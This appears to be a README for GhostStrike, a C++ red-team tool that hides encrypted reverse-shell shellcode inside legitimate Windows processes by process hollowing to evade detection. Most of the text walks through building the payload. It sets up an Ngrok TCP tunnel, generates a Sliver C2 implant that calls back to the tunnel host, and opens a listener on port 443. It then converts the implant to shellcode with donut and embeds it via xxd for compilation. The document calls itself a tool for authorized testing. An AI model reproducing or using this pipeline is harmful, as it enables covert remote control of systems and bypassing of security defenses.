GhostStrike is a stealthy C++ tool that deploys encrypted reverse shells via advanced process hollowing techniques to evade detection during Red Team operations.
GhostStrike is primarily used by ethical hackers and Red Team professionals to covertly execute reverse shells on Windows systems while bypassing security defenses. It enables penetration testers to simulate sophisticated attacks by injecting encrypted shellcode into legitimate processes, thereby assessing an organization's detection and response capabilities.
GhostStrike is intended strictly for educational and authorized penetration testing environments; unauthorized use is prohibited. Users should ensure compliance with legal and ethical guidelines before deployment. The tool requires basic familiarity with C++ compilation and Red Team infrastructure setup, including Ngrok and the Sliver C2 framework.
Use any modern C++ compiler such as g++, clang++, or Visual Studio to compile the source code
No additional dependencies are required
Simply compile the source code with your preferred C++ compiler
ngrok tcp 443
Create an Ngrok TCP tunnel to expose a local port for remote connections
generate --mtls x.tcp.ngrok.io --save YourFile.exe
Generate a Sliver C2 implant executable configured to connect to the specified Ngrok endpoint
mtls --lhost 0.0.0.0 --lport 443
Create a listener on all interfaces at port 443 to receive incoming connections
./donut -i /home/YourUser/YourFile.exe -a 2 -f 1 -o /home/YourUser/YourFile.bin
Convert the generated executable into a binary shellcode format
xxd -i YourFile.bin > YourFile.h
Convert the binary shellcode into a C++ header file for inclusion in the GhostStrike source code
Import YourFile.h to this code
Include the generated shellcode header file into the GhostStrike project source
Compile and enjoy! 🚀
Compile the modified GhostStrike source code to produce the final executable